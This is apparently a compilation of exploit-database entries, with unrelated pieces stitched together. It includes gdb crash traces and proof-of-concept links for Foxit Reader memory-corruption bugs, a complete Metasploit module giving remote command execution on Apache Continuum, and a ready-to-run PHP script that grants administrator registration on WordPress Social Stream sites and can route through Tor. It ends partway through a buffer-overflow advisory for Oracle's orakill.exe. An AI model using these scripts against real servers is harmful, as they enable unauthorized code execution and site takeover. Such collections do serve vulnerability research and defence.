#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>: mov 0x4(%rdx),%rcx
0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>: mov %rcx,(%rbx)
0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>:
movslq 0x320(%rax),%rcx
0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>: mov 0x4(%rbx),%esi
0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>:
movzbl 0x19(%rdx,%rcx,1),%ecx
0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>: shl %cl,%esi
0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>:
movslq 0x320(%rax),%rcx
0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>: mov %esi,0x4(%rbx)
0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>:
movzbl 0x3a(%rdx,%rcx,1),%ecx
0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>: mov (%rbx),%edx
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) x/10wx $dx
0x101d: Cannot access memory at address 0x101d
(gdb) x/10wx $rdx
0x90ff9fc23e15101d: Cannot access memory at address 0x90ff9fc23e15101d
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39943.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set because we are testing the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
(gdb) where
#0 0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
#1 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#2 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#3 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#4 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#5 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#7 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#8 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#9 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>:
mov 0x0(%r13,%rbp,8),%rcx
0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>: test %rcx,%rcx
0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>:
jne 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>
0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>: inc %rbp
0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>: movzbl 0xe(%rbx),%eax
0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>: cmp %ebp,%eax
0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>:
jg 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>
0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>:
jmp 0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145>
0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>: mov 0xc(%rsp),%esi
0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>: mov %r15,%r9
(gdb) info reg
rax 0x7c 124
rbx 0x1a66130 27681072
rcx 0xe1a704fcae02ca58 -2186773610767398312
rdx 0x7fffffffceec 140737488342764
rsi 0x2f 47
rdi 0x1a66130 27681072
rbp 0x0 0x0
rsp 0x7fffffffce90 0x7fffffffce90
r8 0xab0f92 11210642
r9 0x6a83f4ca 1787032778
r10 0xfd 253
r11 0x0 0
r12 0x7fffffffceec 140737488342764
r13 0xe1a704fcae02ca58 -2186773610767398312
r14 0xab0f92 11210642
r15 0x6a83f4ca 1787032778
rip 0xaab96c 0xaab96c <CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const+94>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
--- cut ---
Attached are three proof of concept PDF files.
There is another crash likely related to this issue:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
(gdb) where
#0 0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
#1 0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const ()
#2 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#3 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#4 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#5 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#7 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#8 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#9 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>: cmp %edi,(%rsi)
0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>: jne 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>
0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>: xor %eax,%eax
0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>: cmpb $0xfe,0x4(%rsi)
0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>: setne %al
0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>: xor $0x1,%eax
0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>: retq
0xab0fa5 <_CompareDWord>: mov (%rdi),%eax
0xab0fa7 <_CompareDWord+2>: sub (%rsi),%eax
0xab0fa9 <_CompareDWord+4>: retq
(gdb) info reg $rsi
rsi 0x71 113
--- cut ---
Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39944.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Apache Continuum <= 1.4.2: the installation.varValue POST parameter of
  # /continuum/saveInstallation.action is evidently handed to a shell (this
  # module relies on backtick substitution), so an arbitrary command runs on
  # the server. Delivery is a CmdStager (bourne flavor) driven through
  # execute_command below.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Apache Continuum Arbitrary Command Execution',
        'Description'    => %q{
          This module exploits a command injection in Apache Continuum <= 1.4.2.
          By injecting a command into the installation.varValue POST parameter to
          /continuum/saveInstallation.action, a shell can be spawned.
        },
        'Author'         => [
          'David Shanahan', # Proof of concept
          'wvu'             # Metasploit module
        ],
        'References'     => [
          ['EDB', '39886']
        ],
        'DisclosureDate' => 'Apr 6 2016',
        'License'        => MSF_LICENSE,
        'Platform'       => 'linux',
        'Arch'           => [ARCH_X86, ARCH_X86_64],
        'Privileged'     => false,
        'Targets'        => [
          ['Apache Continuum <= 1.4.2', {}]
        ],
        'DefaultTarget'  => 0
      )
    )

    register_options([
      Opt::RPORT(8080)
    ])
  end

  # Fingerprint via the about page. A body mentioning "1.4.2" is reported as
  # Appears (note this is a plain substring test, so e.g. "1.4.20" would
  # match too), any other HTTP 200 as Detected, no response at all as Safe.
  def check
    res = send_request_cgi('method' => 'GET', 'uri' => '/continuum/about.action')
    return CheckCode::Safe unless res
    return CheckCode::Appears if res.body.include?('1.4.2')
    return CheckCode::Detected if res.code == 200
    CheckCode::Safe
  end

  def exploit
    print_status('Injecting CmdStager payload...')
    execute_cmdstager(flavor: :bourne)
  end

  # Invoked by CmdStager for every chunk it wants executed. The command is
  # wrapped in backticks so the target shell substitutes it while processing
  # installation.varValue; a cmd containing a backtick of its own would end the
  # substitution early, which is worth checking before switching stager flavor.
  def execute_command(cmd, opts = {})
    vars = {
      'installation.name'     => Rex::Text.rand_text_alpha(8),
      'installation.type'     => 'jdk',
      'installation.varValue' => "`#{cmd}`"
    }
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => '/continuum/saveInstallation.action',
      'vars_post' => vars
    )
  end
end
<?php
/**
* Exploit Title: WordPress Social Stream Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://codecanyon.net/item/wordpress-social-stream/2201708?s_rank=15
* Version: 1.5.15
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Authenticated wp_options overwrite
* Time line: Found [14-May-2016], Vendor notified [14-May-2016], Vendor fixed: [v1.5.16 19/05/2016 (Current Version)], [RD:1465606136]
*/
// HTTP client used by every request below: the project-local CurlWrapper (not part of this listing).
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
// Short options: -t target URL, -m mode, -u user, -p password (-f/-c are parsed but never read);
// the long --tor option is declared with a value ('tor:'), so it must be given as --tor=<anything>.
$options = getopt("t:m:u:p:f:c:",array('tor:'));
// Echoes the parsed options, including the -p password, to stdout.
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
// NOTE(review): when CURLOPT_PROXY carries a scheme prefix, libcurl takes the proxy type from that
// prefix, which would make the explicit CURLOPT_PROXYTYPE (7, presumably CURLPROXY_SOCKS5_HOSTNAME)
// moot; 'socks5h://127.0.0.1:9150' is likely what the Tor Browser SOCKS port wants -- confirm with
// the CurlWrapper/libcurl version in use before relying on this path for anonymity.
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
// Leak check: asks a third-party service for our public IP and prints it. Nothing below verifies
// the answer; the operator is expected to eyeball it and confirm interactively.
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
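/**
 * Log in to WordPress with the -u/-p credentials and keep the session cookie in cookies.txt.
 *
 * Reads the globals $curl (CurlWrapper) and $options ('t' = base URL, 'u' = user, 'p' = password).
 * The raw login response is always written to login.html so a failed attempt can be inspected;
 * the script aborts unless wp-login.php answers with a 302, which is treated as "logged in".
 * (The original wrote login.html only after the failure check, so the file it told the user
 * to look at never existed on failure.)
 */
function logIn(){
    global $curl, $options;
    // Start from an empty cookie jar so a stale session from a previous run cannot be reused.
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    // Initial GET, presumably to collect any pre-login cookies the site sets.
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status = $curl->getTransferInfo('http_code');
    // Save the response before the status check: the failure message below promises it is on disk.
    file_put_contents('login.html',$curl->getResponse());
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
}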
/**
 * Flip the blog's default registration role through the plugin's dcwss_update AJAX action,
 * which writes an arbitrary wp_options entry for any logged-in user (a subscriber is enough,
 * per the usage text). Mode admin_on sets default_role to administrator, admin_off resets it
 * to subscriber. Uses the global $curl session and $options['m']/$options['t'].
 */
function exploit(){
    global $curl, $options;
    // mode => array(progress label, role written to the default_role option)
    $modes = array(
        'admin_on'  => array("\nEnabling Admin mode\n", 'administrator'),
        'admin_off' => array("\nDisabling Admin mode\n", 'subscriber'),
    );
    if (!isset($modes[$options['m']])) {
        return;
    }
    list($label, $role) = $modes[$options['m']];
    echo $label;
    $data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>$role );
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    echo "Response: ". $resp."\n";
}
// Entry sequence: authenticate first (aborts on failure), then perform the selected mode.
logIn();
exploit();
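/**
 * Validate and normalise the getopt() result.
 *
 * Returns false (the caller prints usage) unless -t is a syntactically valid URL and -u, -p and
 * -m (admin_on|admin_off) are all present. On success returns the options array with -t
 * guaranteed to end in '/' and the optional --tor flag turned into a boolean under 'tor'.
 * The original also checked for mode 'r' requiring -f; that branch was unreachable because
 * 'm' is already restricted to admin_on/admin_off, so it is dropped here.
 */
function validateInput($options){
    // getopt() returns an array for a repeated option; filter_var() rejects that as well.
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) || !isset($options['p']) ){
        return false;
    }
    if ( !isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off'), true) ){
        return false;
    }
    if (substr($options['t'], -1) !== '/'){
        $options['t'] = $options['t'].'/';
    }
    $options['tor'] = isset($options['tor']);
    return $options;
}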
/**
 * Print the usage text (with the script name from $argv[0] substituted in) and exit.
 */
function showHelp(){
    global $argv;
    // Nowdoc: nothing is interpolated here; the program name is substituted afterwards.
    $usage = <<<'EOD'
WordPress Social Stream Expoit Pack
Usage: php {PROG} -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Sets default role on registration to Administrator
admin_off - Sets default role on registration to Subscriber
Exploit Flow: Call the exploit with -m admin_on, and register a user manually.
After registration call the exploit agiain with -m admin_off .
Examples:
php {PROG} -t http://localhost/wordpress --tor=yes -u customer1 -p password -m admin_on
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
    echo str_replace('{PROG}', $argv[0], $usage)."\n\n";
    die();
}
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt
[+] ISR: apparitionsec
Vendor:
==============
www.oracle.com
Product:
===================
orakill.exe v11.2.0
The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle
sessions directly from the DOS command line without requiring any connection to the database.
C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h
Usage: orakill sid thread
where sid = the Oracle instance to target
thread = the thread id of the thread to kill
The thread id should be retrieved from the spid column of a query such as:
select spid, osuser, s.program from
v$process p, v$session s where p.addr=s.paddr
Vulnerability Type:
===================
Buffer Overflow
Reference:
==========
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Vulnerability Details:
=====================
A ToLower() filter is applied to the supplied arguments (e.g. 'A' \x41 becomes 'a' \x61, etc.), so any payload has to survive lower-casing; an encoder
technique such as "ALPHA3" may make that possible. A second argument of just 4 bytes must also be supplied to trigger the access violation.
orakill.exe <104 bytes>, <4 bytes>
Register dump.
EAX 40000000
